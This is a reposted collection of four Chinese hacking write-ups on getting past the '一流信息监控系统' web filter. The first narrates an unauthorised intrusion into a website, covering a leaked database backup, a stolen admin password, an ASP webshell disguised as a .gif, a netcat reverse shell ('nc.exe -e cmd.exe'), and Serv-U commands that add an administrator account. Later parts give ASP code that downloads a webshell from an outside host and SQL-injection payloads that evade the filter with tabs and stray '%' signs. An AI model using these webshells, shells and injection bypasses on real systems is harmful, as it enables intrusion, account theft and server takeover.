当前位置：首页 > 实用文档 > 其他范文> 突破一流信息监控系统传木马并获得系统权限

突破一流信息监控系统传木马并获得系统权限

时间：2022-12-19 08:01:11 其他范文收藏本文下载本文

突破一流信息监控系统传木马并获得系统权限（集锦6篇）由网友“kisengo”投稿提供，下面是小编为大家准备的突破一流信息监控系统传木马并获得系统权限，欢迎阅读借鉴。

篇1：突破一流信息监控系统传木马并获得系统权限

今天终于GK完了无聊闲逛在网上，意识催魂试的找我要文章...哈~发现一迷信网站，不爽...（入侵需要理由吗？不需要吗？需要吗？....）用telnet www.xxx.com 80get enterHTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Wed, 08 J

今天终于GK完了

无聊闲逛在网上，意识催魂试的找我要文章...

哈~发现一迷信网站，不爽...

（入侵需要理由吗？不需要吗？需要吗？....）用

telnet www.xxx.com 80get enterHTTP/1.1 400 Bad Request

Server: Microsoft-IIS/5.0

Date: Wed, 08 Jun 11:56:00 GMT

Content-Type: text/html

Content-Length: 87Error

失去了跟主机的连接，F:\Documents and Settings\lu\桌面>看到没，获得很多有用的信息哦先去WEB上看看有没有什么漏洞哈！发现DVBBS7.1 论坛前几天有朋友告诉我件事情，说有许多白痴管理员用备分的日期做备分数据库的名字哦！试试看！dvbbs7.1 是4月6日更新的，他用该用200504**.mdb做名字来命名以前的旧数据库！

没办法，试试！www.xxxx.com/bbs/databackup/20050406.mdb

www.xxxx.com/bbs/databackup/20050407.mdb

www.xxxx.com/bbs/databackup/20050408.mdb

.....

晕..到32了还没出来

管理员不是白痴哦！

www.xxxx.com/bbs/databackup/200504.mdb

faint!他不是白痴谁是！

跳出了可爱的下载对话框！downloading.... 完成！用辅臣数据库浏览器打开，选择Dv_Log(2586)

字段名选择l_content 关键字添password2点查询

许多信息出来了哦！

经过筛选

发现一条：

ldusername=叼防&username2=叼防&password2=19841202&adduser=叼防&id=12&Submit=更新哈，想到什么了？登陆啊，不过用户名不知道，是葛飞吗~开玩笑，那简单，其实转化这个我用他本身的页面，

在登陆页面上用户名和密码乱添

点登陆

www.xxx.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=填写登录信息填写登录信息这句话意思是“填写登录信息”那么就把填写登录信息换成叼防！提交！看到了吧！用户名是“叼防”

晕！

什么名字啊！不管了，登陆！

成功！呵呵~把老兵的asp站长助手另存为admin_system321.gif上传！晕！一流信息监控系统提醒您：很抱歉，由于您提交的内容中或访问的内容中含有系统不允许的关键词或者您的IP受到了访问限制，本次操作无效，系统已记录您的IP及您提交的所有数据。请注意，不要提交任何违反国家规定的内容！本次拦截的相关信息为：drop table换海阳top的传，在晕...还是被拦截！不行！我就不信上不去！

<%if err then%>

end if %>

<%On Error Resume Next

if request(“cmdx”)=“cmd.exe” then

response.write oScriptlhn.exec(“cmd.exe /c”&request(“cmd”)).stdout.readall

end if

response.write oScriptlhn.exec(request(“cmdx”)&“ /c”&request(“cmd”)).stdout.readall

保存成为cmd.gif

上传成功！

登陆后台用数据库管理还原成根目录下的admin_system321.asp_system321.asp“>www.xxx.com/bbs/admin_system321.asp登陆，啊...CMD窗口那里显示无法找到该页

您正在搜索的页面可能已经删除、更名或暂时不可用，

--------------------------------------------------------------------------------请尝试以下操作：确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。

如果通过单击链接而到达了该网页，请与网站管理员联系，通知他们该链接的格式不正确。

单击后退按钮尝试另一个链接。

HTTP 错误 404 - 文件或目录未找到。

Internet 信息服务 (IIS)--------------------------------------------------------------------------------技术信息（为技术支持人员提供）转到 Microsoft 产品支持服务并搜索包括“HTTP”和“404”的标题。

打开“IIS 帮助”（可在 IIS 管理器 (inetmgr) 中访问），然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。把我的SYSTEM32下的CMD.exe用记事本打开，另存为111.gif上传！

在用刚才的方法备分成跟目录下的cmd.exe把刚才cmd.gif里cmd.exe改成他的绝对路径全都上传！然后备分！

访问_system321.asp”>www.xxx.com/bbs/admin_system321.asp

哈！成功！

在用上面的方法把nc传上去！

本地命令提示符执行 nc -vv -l -p 9999

在webshell里执行nc.exe -e cmd.exe 自己IP 9999

NC监听的窗口就出现一个可爱的SHELL在写个文件如下echo USER LocalAdministrator>2.txt

echo PASS #l@$ak#.lk;0@P>>2.txt

echo SITE MAINTENANCE>>2.txt

echo -setdomain>>2.txt

echo -Domain=MyFTP^|0.0.0.0^|22^|-1^|1^|0 >>2.txt

echo -DynDNSEnable=0 >>2.txt

echo DynIPName=>>2.txt

echo -SETUSERSETUP>>2.txt

echo -IP=0.0.0.0>>2.txt

echo -PortNo=22>>2.txt

echo -User=tyrant>>2.txt

echo -Password=19851011>>2.txt

echo -HomeDir=c:\>>2.txt

echo -Maintenance=System>>2.txt

echo -Ratios=None>>2.txt

echo Access=c:\^|RWAMEICDP>>2.txt

echo -GETUSERSETUP>>2.txt“^”符号的作用相信大家都了解吧！我不罗嗦了。把上面批处理保存为1.txt在SHELL中用NC提交nc 127.0.0.1 43958 <1.txt回显发现220 Domain settings saved

200-User=test1

200 User settings saved成功了！成功添加了用户tyrant密码19851011登陆对方的ftp

转到system32文件夹下quote site exec “net.exe user tyrant 19851011 /add”quote site exec “net.exe localgroup administrators tyrant /add”quote site exec “net.exe user start telnet”用tyrant管理员telnet上去

传个批处理开3389哈...正在连接到...文章到此结束

篇2：突破一流信息监控系统实现文件“上传”

在我们入侵网站的过程中，有时候提交我们的大马或者其它ASP文件的时候，会被一流信息监控系统所拦截，这是因为它设置了限制提交字符，

既然它不允许我们进行提交，那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候，网站禁止了上传，但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中。好了，这个方法就是，只要服务器没有禁用XML和数据流组件，我们可以往服务器中提交以下ASP脚本文件

Set xPost = CreateObject(“Microsoft.XMLHTTP”)

xPost.Open “GET”,“www.waitalone.cn/test.txt”,False //代码在网上的地址也就是大马

xPost.Send

Set sGet = CreateObject(“ADODB.Stream”)

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath(“test.asp”),2 //在根目录生成的文件

set sGet = nothing

set sPOST = nothing

response.Write(“下载文件成功！”)

利用服务器的XML和数据流组件，从我的blog的ak.txt的内容下载到目标站点根目录并保存为ak.asp，

ak.txt中的内容当然就是被拦截的内容了。之后访问这个提交的ASP网页文件，会出现一片空白，然后我们再访问这个ak.asp文件，则想要上传的内容已经被保存成功！

篇3：突破一流信息监控拦截系统进行SQL注射

教程贴士：上回渗透一站点，SQL Injection测试时返回这个页面

上回渗透一站点，SQL Injection测试时返回这个页面（图1）

我晕，原来服务器上装了一个叫“一流信息监控拦截系统”的BT玩意儿，扫兴！查查它老底先，

Google一下“一流信息监控拦截系统”。原来这是广州××信息科技公司开发的内容监控系统，用来监控拦截非法信息的，当然也包括SQL注射。它主页上软件功能介绍赫然写着：“软件可以全面拦截任何的SQL注入式的攻击，就算多差的程序都不用担心了”。嘿嘿，大哥，牛皮不要吹得太大哟，不然怎么好下台啊。

看他把话说得那么绝，我一定要给他点颜色瞧瞧。呵呵，不是说只有想不到没有做不到么，嗯，让我想想先。网上没有找到那软件下载，算啦，就直接在网站上测试好了。

经过几回合测试，我发现那个软件是拦截独立的关键词，也就是拦截字符串“and”，而不会拦截包含“and”的字符串如“island”。提交xxx/x.asp?x=island 1=2时没问题，而提交xxx/x.asp?x=a and 1=1时就被拦截了。

呵呵，明白了吧，实际上程序要判别到底是不是完全匹配真正拦截的字符串是空格+关键词+空格（本例中就是“ and ”）。如果用ASP代码表示的话就是：

If Instr(1 , StrQuest , “ and “ , 1) Then

Response.Write( “一些废话” )

Response.End

End If

拦截原理搞懂了，问题是怎么突破呢？往下看，

关键字是要注射要用到的，乱动不得，就只有从空格入手了。呵呵，想想什么东东可以代替空格啊，对，就是Tab！现在我修改URL用tab代替and前后的两个空格，呵呵，看看图2吧（Tab -->“%09”，空格 -->“%20”）。

Yeah，成功啦！传说中的一流信息监控拦截系统被我们绕过去了。哈哈，那个什么系统正好是个漏洞百出的Web程序，呵呵，继续如法炮制进行SQL注射拿管理员帐号密码得WebShell，那些都是体力活了，略过略过。

有了WebShell，执行“net user”命令又被他拦截了（这个可恶的家伙……），呵呵，小case啦，那就执行“net user”（中间两个空格）吧^_^

当然这种用Tab代替空格突破限制的方法也不仅仅局限于“一流信息监控拦截系统”，只要是类似的过滤方法就行。比如说青创文章系统（Version 1.5.2.23.7.0），它就是这种过滤方法，但是还过滤了“_”，而它的每个表都是article_xxx的形式，结果还是不能进行猜解。罢休！

最后顺便说下，一流信息监控系统“可以实时监控用户上传到服务器的每一张图片”、“对使用服务器的用户进行关键字监控，无论是通过 FTP方式上传或web方式上传的文件都可以准确监控，将不法用户的行为记录在案”等功能，好像侵犯隐私权了……

篇4：突破一流信息监控系统等IIS防火墙实现注入

langouster 邪恶八进制

先来说URL编码，%加两位的16进制表示一个字符，比如’经过编码之后就是%27，这是人人都知道的URL编码规则，UrlUnescapeInPlace之类的API函数甚至于程序员自己写的URL译码函数都是基于这一思想，

然而，我们何必如此听话，试想一下要是%后跟的不是16进制数字而是像abc%hh会发生什么事呢。先看UrlUnescapeInPlace，

写个小程序试一下，abc%hh经过译码还是abc%hh；再看asp.dll是怎么译码的，在asp页面中写入 response.Write(request.QueryString(“str”))，然后用?str=abc%hh访问它，页面显示abchh，它直接把%给去掉了。

现在来思考要是我们提交sele%ct，信息监控系统得到的字符串还是sele%ct，当然它不是危险字符，它就不会拦截，但对于ASP，它得到的可就是select了，其它的同理，’可用%’表示，比如and exists(select * from admin)可转化为以下字符串a%nd ex%ists(%select * %from ad%min)，

此方法可举一反三，比如用%%代替%都可以，还可以是其它的，具体的可以去看RFC2396。

以上仅是对于GET方式的分析，POST没试过，不过猜想也是可以的。并且经测试以上方法对目前的所有IIS防火墙都有效，包括VIF。

补充：其实发现这个漏洞已经有好些日子了，本来我是不想公开的，前些天两次给一流信息监控的人发邮件提醒他们，但他们就是没认真考虑我说的问题，还说一流信息系统可以把经过编码的注入字符也加到过滤清单中，不知道他们是怎么想的，他是觉得再加一条sele%ect过滤规则就可以了？那sele%%ct呢，也加上？那sele%%%ct呢？？鉴于一流这种无所谓的态度我就公开此漏洞，希望他们能以此为鉴。